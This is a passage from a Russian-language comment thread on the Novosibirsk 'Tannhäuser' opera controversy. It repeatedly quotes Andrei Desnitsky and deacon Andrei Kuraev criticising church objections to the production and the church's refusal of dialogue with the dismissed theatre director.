    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  17. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  18. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

Добавить комментарий